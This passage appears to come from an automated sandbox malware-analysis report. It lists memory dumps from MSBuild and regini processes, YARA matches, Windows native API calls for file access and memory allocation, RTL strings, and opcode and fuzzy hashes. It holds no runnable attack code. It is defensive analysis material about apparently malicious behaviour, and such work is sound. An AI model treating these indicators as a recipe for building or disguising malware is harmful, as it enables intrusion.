                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011802E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 0510b12f5fbb482eaa2a0ab795006e96ade95b4b9e5e098fcbf25be59af009da
                                                                                                              • Instruction ID: 72c791cef63d21f8b8028aaa83937401a4c40e366569862693f25b96a7e3b515
                                                                                                              • Opcode Fuzzy Hash: 0510b12f5fbb482eaa2a0ab795006e96ade95b4b9e5e098fcbf25be59af009da
                                                                                                              • Instruction Fuzzy Hash: FFE19E70A087469FD72DDF28C884B2ABBE1BB88314F144A5DF5A58B2E1D774D845CB43
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 01187BAC
                                                                                                              • RTL: Resource at %p, xrefs: 01187B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01187B7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 34ae2bb837065a887f37c6a28844a41db662a7c75adf4bc58e3678677660c5ae
                                                                                                              • Instruction ID: 68e5fb449c3bc961312b56841d0ec6fd75d7e9aefbebd4f46276dabea795b57f
                                                                                                              • Opcode Fuzzy Hash: 34ae2bb837065a887f37c6a28844a41db662a7c75adf4bc58e3678677660c5ae
                                                                                                              • Instruction Fuzzy Hash: 8541F6353057029FD728DE29C840B6AB7E5EF94B10F100A1DFA9ADB680D731E8058F96
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0118728C
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 011872C1
                                                                                                              • RTL: Resource at %p, xrefs: 011872A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01187294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: e15adce722aab2f41a3620d3e78b46bf631daeb74b49faa1578331635f178827
                                                                                                              • Instruction ID: cff1f52c6011afc80762ef8819b491133c156157223ccc58ffa8a015fa7c860e
                                                                                                              • Opcode Fuzzy Hash: e15adce722aab2f41a3620d3e78b46bf631daeb74b49faa1578331635f178827
                                                                                                              • Instruction Fuzzy Hash: 9E413531704202ABC718DE29CC41B66BBA5FF54714F244619F995DB680DB30E842CBD1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 85b0a001f1650a5112a85ff69777e9c72c41eff187cbc4c8c9f1fcb5bd812089
                                                                                                              • Instruction ID: 0d4600470a4c701a55dc38ff6ca971ad8be7b738369fae457717f13afce40e5e
                                                                                                              • Opcode Fuzzy Hash: 85b0a001f1650a5112a85ff69777e9c72c41eff187cbc4c8c9f1fcb5bd812089
                                                                                                              • Instruction Fuzzy Hash: 91319A72A001199FDB24DF2DCC40BEEB7F8FF58610F44059AE949D3140EB309A548B60
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 5a64cdd0b6003b9d240749848ae3f0afd7f73d0bfb603de1de26c569fad14b6c
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: 6E91B271E00216DFEBACDF6DC8826BEBBA5EF44320F94451AED75A72C0D73089418752
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 5fc0abd0608e23522fc89673ac5852d7c157e6d5a41e47f0f2d69d6aba86f15c
                                                                                                              • Instruction ID: 011b887749d82ecaba7eb643440b52c1dbb8140952e8294141f708ddcbaa0e49
                                                                                                              • Opcode Fuzzy Hash: 5fc0abd0608e23522fc89673ac5852d7c157e6d5a41e47f0f2d69d6aba86f15c
                                                                                                              • Instruction Fuzzy Hash: 66811C71D002699BDB39DB54CC44BEEBBB8AF48754F0041EAEA19B7280D7705E85CFA1

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.5%
                                                                                                              Dynamic/Decrypted Code Coverage:4%
                                                                                                              Signature Coverage:2.1%
                                                                                                              Total number of Nodes:479
                                                                                                              Total number of Limit Nodes:79

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P$*5$3$8P$Ri$_S$d$e$g&$C$[
                                                                                                              • API String ID: 0-3557587716
                                                                                                              • Opcode ID: ba4ca5e3aed733b28ba8d0d2b997c9f66a207a9f8aec4634ebc5432cbef62017
                                                                                                              • Instruction ID: c3481549e43d527aa1d640b1ca261ce91eee58d25257cd53a6e82f2ab6548fce
                                                                                                              • Opcode Fuzzy Hash: ba4ca5e3aed733b28ba8d0d2b997c9f66a207a9f8aec4634ebc5432cbef62017
                                                                                                              • Instruction Fuzzy Hash: D5C1F2B0D05218DFEB24CF84D89479EBBB2FF55308F20819AD009AB381D7B95A95CF56
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 004BC614
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 004BC64F
                                                                                                              • FindClose.KERNELBASE(?), ref: 004BC65A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: bb8687520c3024c0b5dcd78b49cceb22e88c118e3d67c23c330271cbefa2063d
                                                                                                              • Instruction ID: 7ebdd79678cb3d83805ea2f5d99ad6b45e74c773f426063f473314b1267de8a9
                                                                                                              • Opcode Fuzzy Hash: bb8687520c3024c0b5dcd78b49cceb22e88c118e3d67c23c330271cbefa2063d
                                                                                                              • Instruction Fuzzy Hash: B931D6B19002087BDB20DF65CCC5FFF777C9B55708F14444EB908A6191E674AE848BA9
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004C9261
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 004C93B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(004B1CAE,?,004C7F1F,00000000,00000004,00003000,?,?,?,?,?,004C7F1F,004B1CAE), ref: 004C96BB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 004C94B7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2e1166f6553428baa85a30f2195cde13bd6230fdba89d0d069fde0ad46c11473
                                                                                                              • Instruction ID: e57d9a67080c0afea3ac4c9852f54469e77ccc0073fe0d55c90b02e4a3f6f7c7
                                                                                                              • Opcode Fuzzy Hash: 2e1166f6553428baa85a30f2195cde13bd6230fdba89d0d069fde0ad46c11473
                                                                                                              • Instruction Fuzzy Hash: 1E90026120580503D64175594804A07000587D0302F65C015A206C775E8A2A8D517135
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 824ade85ebdd7ee6aa9b9ec6cd3e35bc1a6db8b7dd39c97caf12d3089d751bdb
                                                                                                              • Instruction ID: 52cc7c3548773bc91a018235697f6a665cfe63e9ec88237bab1dad6db672214d
                                                                                                              • Opcode Fuzzy Hash: 824ade85ebdd7ee6aa9b9ec6cd3e35bc1a6db8b7dd39c97caf12d3089d751bdb
                                                                                                              • Instruction Fuzzy Hash: 1090022160540602D60271594404A17000A87D0241FA5C026A102C775ECA268E92B131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 650b36942388c1619922473b5caa68cca596bc3362deea03293fd9231b7c2103
                                                                                                              • Instruction ID: f836c76b57dc4d13f407fd40933ae7bbce3d1c5ef7feb2f4b4d7c746028fc84c
                                                                                                              • Opcode Fuzzy Hash: 650b36942388c1619922473b5caa68cca596bc3362deea03293fd9231b7c2103
                                                                                                              • Instruction Fuzzy Hash: 79900221215C0142D70175694C14F07000587D0303F65C119A015C774CC9168D616521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d742198b3969a4eb0a0f35a7b4c1f4e52124c7dc7850b74093e80b722ac9e79a
                                                                                                              • Instruction ID: b71f70a77836ed3d36df0da601ec4dddcb62f805e71b362b978c5d6d8925dfd4
                                                                                                              • Opcode Fuzzy Hash: d742198b3969a4eb0a0f35a7b4c1f4e52124c7dc7850b74093e80b722ac9e79a
                                                                                                              • Instruction Fuzzy Hash: 6D90022160540142464171698844D074005ABE1211765C125A099C770D855A8D656665
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8ab6efd87aeabddf8ba6549ac37cbf807273ab8506414d57bb54d564774464de
                                                                                                              • Instruction ID: e31724aa89370f5ec178aa8d6caabf33122de3d8fc4692c4b6112b8df3dd89ea
                                                                                                              • Opcode Fuzzy Hash: 8ab6efd87aeabddf8ba6549ac37cbf807273ab8506414d57bb54d564774464de
                                                                                                              • Instruction Fuzzy Hash: 4190026134540542D60171594414F070005C7E1301F65C019E106C774D861ACD527126
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d37403e808d8334f0f365f346d4e4cba58f7eb164cd5c92a6172bb5eb0a8d574
                                                                                                              • Instruction ID: 92e357aff0fb759145fa2ae472ba76d0f49c17b25c3250af0130b1c7d149a973
                                                                                                              • Opcode Fuzzy Hash: d37403e808d8334f0f365f346d4e4cba58f7eb164cd5c92a6172bb5eb0a8d574
                                                                                                              • Instruction Fuzzy Hash: 1C90023120540502D60175995408A47000587E0301F65D015A502C775EC6668D917131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2c5f88bd1613dcea5d743d50fdd030e3a5562715f86ed6d76ff527cea1caac71
                                                                                                              • Instruction ID: 2201b55b5dc446577779a53e3c29529a89055b781f2b8675dafa0114b0ab3588
                                                                                                              • Opcode Fuzzy Hash: 2c5f88bd1613dcea5d743d50fdd030e3a5562715f86ed6d76ff527cea1caac71
                                                                                                              • Instruction Fuzzy Hash: 8690023120548902D61171598404B4B000587D0301F69C415A442C778D86968D917121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                                              • Instruction ID: 52c25b1210c3f989b3e86a8f9445bdf027f608b8f01902210b95e8bad9dd3970
                                                                                                              • Opcode Fuzzy Hash: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                                              • Instruction Fuzzy Hash: 1690023120540942D60171594404F47000587E0301F65C01AA012C774D8616CD517521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
                                                                                                              • Instruction ID: c5cd1b794bd7c10e573a6a9d17368cfb09a858349fd63a00c817c15cd50c31b3
